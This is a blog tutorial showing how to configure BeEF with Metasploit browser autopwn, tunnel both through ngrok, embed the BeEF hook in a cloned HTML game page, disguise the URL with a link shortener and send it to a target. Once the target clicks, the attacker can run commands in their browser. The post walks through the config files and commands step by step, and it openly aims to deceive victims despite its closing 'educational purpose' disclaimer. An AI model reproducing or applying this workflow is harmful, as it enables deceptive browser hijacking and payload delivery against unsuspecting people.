Integrating Metasploit with Beef-xss Framework
Read Time3 Minutes, 39 Seconds

Welcome lads to hacking a rise as always Im the laughing man and in this post i will show u how to integrate beef-xss with metasploit for browser autopwn
this will gave to a payload on targets device how sneaky is that hahaha so i wont be using the basic beef default page as i want make this look as real as i can i will all so be using link shorter’s to hide the url and i will be using beef-over-wan and ngrok to find out how to set up and use Beef-over-wan check my other post on beef over wan here so lets begin

What is Beef-xss Framework

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. … BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
credits :Beefproject.com

what is metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7
credits:wikipedia.org

How to integrate Metasploit with Beef-xss Framework

first of all we need to open the terminal and type gedit /usr/share/beef-xss/config.yaml and scroll down to metasploit and change enabled to true and then save

Next we edit the /usr/share/beef-xss/extensions/metasploit/config.yaml so type gedit /usr/share/beef-xss/extensions/metasploit/config.yaml
in this file we need to set are ip and the callback_host: (and put your IP address there) and {os: ‘custom’, path: ”} (just paste the ‘/usr/share/metasploit-framework/’ for the path) to get your local ip use ifconfig

beef:
extension:
metasploit:
name: ‘Metasploit’
enable: true
# Metasploit msgrpc connection options
host: “127.0.0.1”
port: 55552
user: “msf”
pass: “abc123”
uri: ‘/api’
ssl: true
ssl_version: ‘TLS1’
ssl_verify: true
# Public connect back host IP address for victim connections to Metasploit
callback_host: “127.0.0.1”
# URIPATH from Metasploit Browser AutoPwn server module
autopwn_url: “autopwn”
# Start msfrpcd automatically with BeEF
auto_msfrpcd: true
auto_msfrpcd_timeout: 120
msf_path: [
{os: ‘osx’, path: ‘/opt/local/msf/’},
{os: ‘livecd’, path: ‘/opt/metasploit-framework/’},
{os: ‘bt5r3’, path: ‘/opt/metasploit/msf3/’},
{os: ‘bt5’, path: ‘/opt/framework3/msf3/’},
{os: ‘backbox’, path: ‘/opt/backbox/msf/’},
{os: ‘kali’, path: ‘/usr/share/metasploit-framework/’},
{os: ‘pentoo’, path: ‘/usr/lib/metasploit’},
{os: ‘custom’, path: ‘/usr/share/metasploit-framework/’}
]

save it

no we need to restart are PostgreSQL so type service postgresql start or /etc/init.d/postgresql restart

(note only use one of the commands )

Now we are ready to start msfconsole whoop whoop so type msfconsole and type load msgrpc ServerHost=127.0.0.1 Pass=abc123 then it starts up .

msf5 > load msgrpc ServerHost=127.0.0.1 Pass=abc123
[*] MSGRPC Service: 127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
msf5 >

Now we can start beef-xss so type this in to a new terminal cd /usr/share/beef-xss/ & then ./beef

as u see it says it works lol

right now that is done we can stop beef-xss and metasploit and start Beef-over-Wan and ngrok you will have to edit the .ngrok2/ngrok.yml so type gedit .ngrok2/ngrok.yml and add this under your key like i have below

tunnels:
first-app:
addr: 80
proto: http
second-app:
addr: 3000
proto: http

now we save and type ngrok start --all

now we can start Beef-Over-Wan so type cd Beef and ls and then python BeeFOverWan.py it will ask you to press 1 or 0 pick 0 to skip the ngrok settings

gave it a min to load then it will ask you for ur frist link so go back to ngrok and copy the link with out the https or http it should look like this (57af450a.ngrok.io) this the one that is open to 80

next is the link we will connect to the dashboard of beef-xss so thats be the one open to 3000 so copy it like this b35c09a4.ngrok.io and paste to beef over wan

now we hit enter and with its done as u can see in the pic below my admin panel url is http://b35c09a4.ngrok.io/ui/panel and the hook url is http://57af450a.ngrok.io/beef.html <--- this be the link you send

Now come the fun part cloning the site so to save time im using a game called PirateJewelCollapse.html so now we go to the html folder in /var/www/html and find the beef.html file and open it in text editor

all we need is the little hook script right there under title just copy it now open the html file u want to use with beef agen im using a game coz im nice like that lol but save it when you done

right lads and gals we can use a link shorter or send the link the way it is be i say link shorter thank god hacking a rise has one lol
so we copy the hook link with out the beef.html and paste to hackingarise link shorter and add the name the html file you are using so the link looks like this http://57af450a.ngrok.io/PirateJewelCollapse.html

now the link as became https://hackingariseofficial.github.io/#UJ6mQ

u can now send it the target and log in to beef-xss frist we log in defult name and pass is beef

now we send the target the link https://hackingariseofficial.github.io/#UJ6mQ

when the target clicks the link the it pop up under online click there ip and u can excute the commands

DISCLAMER

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and https://hackingarise.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law

0 0

About Post Author

Laughingman

Hi im the laughing man im a pentester and the owner of Hacking a rise
0 %
Happy
0 %
Sad
0 %
Excited
0 %
Angry
0 %
Surprise
pentester
Hi im the laughing man im a pentester and the owner of Hacking a rise

Leave a Reply

Your email address will not be published.